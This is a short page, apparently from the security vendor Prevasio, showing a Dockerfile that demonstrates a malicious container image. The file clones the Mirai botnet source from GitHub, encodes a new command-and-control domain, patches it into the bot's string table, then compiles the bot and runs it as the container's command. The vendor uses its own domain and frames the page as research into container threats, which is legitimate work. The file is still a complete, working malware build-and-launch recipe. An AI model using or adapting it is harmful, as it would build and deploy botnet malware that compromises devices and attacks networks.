Dockerfile
The following Dockerfile example demonstrates dynamic malicious container image creation.

The instructions from this file will fetch Mirai source code from Github, patch the default C2 server name with 'prevasio.com', then compile Mirai bot as /mirai_bot.
FROM ubuntu:14.04.5 # the image is based on Ubuntu v14.04.5 # updates the package lists RUN apt update # install GCC compiler RUN apt install -y gcc # install Git RUN apt install -y git # fetch Mirai source code RUN git clone https://github.com/jgamblin/Mirai-Source-Code # compile string encoder tool RUN gcc /Mirai-Source-Code/mirai/tools/enc.c -o /Mirai-Source-Code/mirai/tools/enc.out # drop a shell script into /patch RUN echo "#!/bin/sh" > /patch # mirai's source code contains encoded string 'cnc.changeme.com' # here, we run string encoder tool to encode 'cnc.changeme.com', then escape the encoded string with sed command # the encoded string is placed into old_cnc variable RUN echo "old_cnc=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string cnc.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch # do the same with the encoded string 'report.changeme.com' RUN echo "old_report=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string report.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch # now, encode 'prevasio.com' - our C2's new domain name # for ethical and legal reasons, this is to make sure we don't touch someone else's domain name RUN echo "new_domain=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string prevasio.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch # next, we'll need to patch the source file table.c # this is to replace encoded 'cnc.changeme.com' with encoded 'prevasio.com' RUN echo "sed -i \"s/\$old_cnc/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch # do the same to replace encoded 'report.changeme.com' with encoded 'prevasio.com' RUN echo "sed -i \"s/\$old_report/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch # make our script executable RUN chmod +x /patch # run it to make 2 patches to table.c source RUN /patch # drop a shell script to compile and run the bot into /compile_and_run RUN echo "#!/bin/bash" > /compile_and_run # compile the bot from source with GCC RUN echo "gcc -std=c99 /Mirai-Source-Code/mirai/bot/*.c -DDEBUG -DMIRAI_TELNET -static -g -o /mirai_bot" >> /compile_and_run # run the bot in the background RUN echo "/mirai_bot" >> /compile_and_run # make the script executable RUN chmod +x /compile_and_run # execute the script CMD ["/compile_and_run"]
Copyright © 2020 All Rights Reserved by Prevasio Pty Ltd.